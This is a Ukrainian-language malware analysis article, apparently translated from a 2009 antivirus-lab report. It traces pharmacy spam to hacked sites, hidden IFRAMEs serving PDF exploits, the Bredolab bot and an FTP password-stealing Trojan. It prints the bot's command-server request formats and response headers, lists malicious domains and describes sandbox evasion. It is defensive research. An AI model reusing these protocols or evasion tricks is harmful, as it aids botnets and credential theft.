Фабрика наживи

Дана стаття присвячена результатам дослідження одного спам-повідомлення, які демонструють, які методи використовують сучасні зловмисники для створення ботнетів і проведення спам-розсилок. Ці методи і прийоми носять відверто кримінальний характер і служать одній меті – збагаченню кіберзлочинців.


Спам


На початку літа 2009 року в нашу лабораторію тематичній фільтрації почали надходити листи, на перший погляд нічим не відрізнялися від типових спам-повідомлень. Це була дуже поширена в спамі реклама медикаментів, стандартно оформлена – з HTML-частиною і вставленими картинками:


Приклад спам-листа, надісланого на webmaster@viruslist.com


Однак у цих листів було одне властивості, що виділяють їх із загального потоку спаму. Посилання в листах вели не на сайти спамерів, а на HTML-сторінки, розташовані на легітимних сайтах.


Хоча домени в посиланнях змінювалися від листа до листа, шлях на сервері мав один і той же вид: "1/2/3/4/buy.html".

Оригінальний текст листа, що містить посилання на легальні сайти


Всі сторінки, на які вели посилання, містили однорядковий HTML-файл з тегом META refresh. Призначення цього тега – перенаправити користувача на іншу сторінку, в даному випадку на сайт онлайн-магазину, продає медикаменти, який насправді і рекламували спамери.


Оригінальний текст веб-сторінки, перенаправляють на сайт спамерів


Сайт, на який перенаправлялися користувачі


Одним з методів детектування спаму є занесення до чорного списку доменного імені, зазначеного на засланні в спам-листі, що дозволяє детектувати всі спамові листи рекламної розсилки незалежно від тексту повідомлення. У даному випадку детектування доменів, зазначених у спам листі, не представлялося можливим, так як посилання вели на легальні сайти, причому кожен день співробітники лабораторії тематичній фільтрації фіксували близько 10 нових доменів. Цей метод відомий спамерам вже кілька років, але використовується він рідко, оскільки вимагає великих витрат, ніж придбання нових доменів.


Уявлялося найбільш імовірним, що сайти, зазначені в листах, були зламані та використані зловмисниками для розміщення веб-сторінок, що перенаправляє користувачів на сайт спамерів. Однак залишалося незрозумілим, як зловмисникам вдалося зламати таку велику кількість сайтів?


Сайти


Більшість цих сайтів неможливо було зламати стандартними методами. Побіжний аналіз зламаних веб-ресурсів не показав наявності однакових вразливостей, одних і тих же технологій побудови сайтів і т.д. Більше того, більшість з них були створені тільки на HTML, без будь-яких скриптів. Єдине, що об'єднувало зламані сайти – це наявність папки з файлом "buy.html", який містив HTML-тег, що перенаправляли користувачів на сайт спамерського онлайн-магазину, що продає медикаменти.


Проте в ході поглибленого аналізу вмісту одного з зламаних сайтів був виявлений дуже добре замаскований IFRAME, що перенаправляє користувачів на сайт b9g.ru. Це відразу насторожило аналітиків, тому що подібні IFRAME з посиланням на підозрілі сайти часто використовуються зловмисниками для зараження комп'ютерів користувачів за допомогою експлойтів.

Вміст сторінки зламаного сайту


Аналіз розташування сайту b9g.ru показав, що він розміщений на 5 IP-адреси:



Зібравши інформацію про домени, також зареєстрованих на цих адресах, ми виявили домени, адреси яких використовувалися зловмисниками для вставки в IFRAME на зламаних сайтах, наприклад: a3l.ru, b5r.ru, b5z.ru, b7p.ru, b8o.ru, b9g.ru, c6y.ru, c8k.at, f5l.at, f5x.at і т.д. Це підтвердило наші підозри щодо шкідливості IFRAME, виявленого на зламаному сайті.


Експлойти


На наступному етапі було необхідно виявити, що саме завантажувалося на комп'ютери користувачів з адреси http://b9g.ru :****/*****. php. Як і очікувалося, при першому відвідуванні сайту разом з index.php скачували експлойти. Зловмисники використовували різноманітні уразливості в ПЗ, найнебезпечнішими і "пробивний" з них були експлойти для вразливостей в PDF.

Вміст index.php до і після розшифровки


Бот


Результатом експлуатації вразливостей була завантаження і встановлення на комп'ютери користувачів виконуваного файлу Backdoor.Win32.Bredolab. Функціоналом даної шкідливої програми з реалізованими в ній руткіт-технологіями є завантаження і встановлення інших шкідливих програм.

Частина дампа пам'яті руткіт-даунлоадер, завантаженого з адреси


Bredolab намагається запобігти виконання себе в SandBox. Для цього він перевіряє на відповідність:



Якщо хоча б одна з умов виконується, шкідлива програма завершує свою роботу.


Bredolab також завершує роботу, якщо на зараженому комп'ютері встановлений COMODO Firewall.


В інших випадках Bredolab копіює себе в файл% Temp% ~ TM27FB4A.TMP, впроваджує свій код в explorer.exe, запускає в ньому новий потік і переміщує себе в% Temp% ~ TM% TempName%. Подальша робота бота відбувається у занедбаному їм потоці, а початковий процес завершується.


При вдалому підключенні до командного центру бот відправляє GET-запит:


GET / l / controller.php? Action = bot & entity_list = {числа через кому}
&uid=11&first={0/1}&guid={VolumeSerialNumber}&rnd=6293712

У відповідь сервер передає боту зашифровані програми, які бот може потім записати в новий файл% Windows% Tempwpv% rand_number%. Exe (з подальшим запуском файлу) або в новий створюваний процес svchost.

Приклад зашифрованого повідомлення від командного центру




HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Jul 2009 17:08:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 55709
Entity-Info: 1241530597:32768:1;1246898982:22941:2;
Rnd: 982101
Magic-Number:
32/1/187: 55:66:132:143:54:243:114:97:146:132:5:192:141:199:113:160:130:101
:167:50:61:32:107:127:128:84:144:169:61:158:100:…

Відповідь командного центру. Ключ для розшифровки, міститься в полі Magic-Number


У ході роботи бот повідомляє господарям ботнету про свою активності, відсилаючи GET-запит вигляду:


GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11&
entity = {число: unique_start / unique_failed / repeat_start / repeat_failed; число :…}

Троянець для крадіжки паролів


У результаті поєднання бота з командним центром на заражену систему завантажувалася і встановлювалася шкідлива програма Trojan-PSW.Win32.Agent.mzh, що здійснює крадіжку паролів до FTP-клієнтам.

Розшифрований код троянця для крадіжки паролів до FTP-клієнтам


Вкрадені паролі для доступу до сайтів через протокол FTP відправлялися зловмисникам на наступну адресу:

Розташування сервера, на який відправлялися вкрадені паролі для доступу до сайтів


Нарешті ситуація зі зламаними сайтами прояснилася. Зловмисники не намагалися зламати безліч сайтів за допомогою SQL-ін'єкцій або експлойтів для движків сайтів – вони просто крали паролі до FTP-клієнтам, і таким чином отримували можливість керувати вмістом сайтів.


За описом троянця Trojan-PSW.Win32.Agent.mzh на хакерських форумах була знайдена система для крадіжки паролів до сайтів, в яку входила дана програма. Систему пропонувалося придбати за $ 2000.


Завантаження інших шкідливих програм


Через тиждень командний центр ботнету віддав команду на завантаження пошукових роботів для розсилки спаму: Rustock (Backdoor.Win32.HareBot) і Pushdo (Backdoor.Win32.NewRest.aq)!


А ще через тиждень на заражені комп'ютери були встановлені шкідлива програма сімейства koobface і фальшивий антивірус.


Схема атаки


У результаті невеликого розслідування, яке почалося зі спам-листа, надісланого на адресу webmaster@viruslist.com, була виявлена наступна схема роботи зловмисників:

Схема роботи системи злому сайтів і розсилки спам-повідомлень


Ця схема демонструє технології та методи, часто використовувані зловмисниками для створення ботнетів і підготовки плацдармів для розсилки спаму:



  1. Злом легітимних ресурсів.

  2. Розміщення на скомпрометованих сайтах сторінок, що перенаправляє відвідувачів на спамерські сайти.

  3. Розміщення на скомпрометованих сайтах посилань на експлойти.

  4. Побудова ботнету з заражених комп'ютерів відвідувачів скомпрометованих сайтів.

  5. Крадіжка паролів до сайтів скомпрометованих користувачів.

  6. Завантаження на машини, що входять у ботнет, спам-ботів для розсилки спаму і інших шкідливих програм.

Дані методи дозволяють зловмисникам організувати добре налагоджений процес, який в ідеалі є зацикленим.


Висновок


Розсилка спамових листів з посиланнями на зламані і заражені сайти триває. Щогодини ми виявляємо кілька десятків нових адрес таких сайтів.


Приклад листа, з посиланням на сторінку на зламаному сайті

Оригінальний текст HTML-частині листа


Посилання (http://…/1.html) вказує на сторінку на зламаному сайті, яка містить тег, що перенаправляє користувача на сайт онлайн-магазину медикаментів.


Спамери використовують цей прийом в різних листах, змінюють імена сторінок-перенаправлень, роздають інші експлойти через IFRAME, але сенс від цього змінюється мало. Всі ці технології, поставлені на потік, використовуються для наживи.


P.S.


У липні з'явилася новина про злом популярного торрент-трекера Torrentreactor. За способом впровадження тегів, що перенаправляє користувачів на сайт з експлойта, видно, що при зломі була використана шкідлива програма для крадіжки паролів до FTP-клієнта. З її допомогою пароль був украдений з комп'ютера, з якого здійснювався доступ на сайт.

Частина зламаного сайту Torrentreactor.net (скріншот з http://securitylabs.websense.com/content/Assets/AlertMedia/Torrenreactor1_alert.jpg)


Це ще один приклад одного з багатьох аналогічних зломів.

Схожі статті:


Сподобалася стаття? Ви можете залишити відгук або підписатися на RSS , щоб автоматично отримувати інформацію про нові статтях.

Коментарів поки що немає.

Ваш отзыв

Поділ на параграфи відбувається автоматично, адреса електронної пошти ніколи не буде опублікований, допустимий HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>

*

*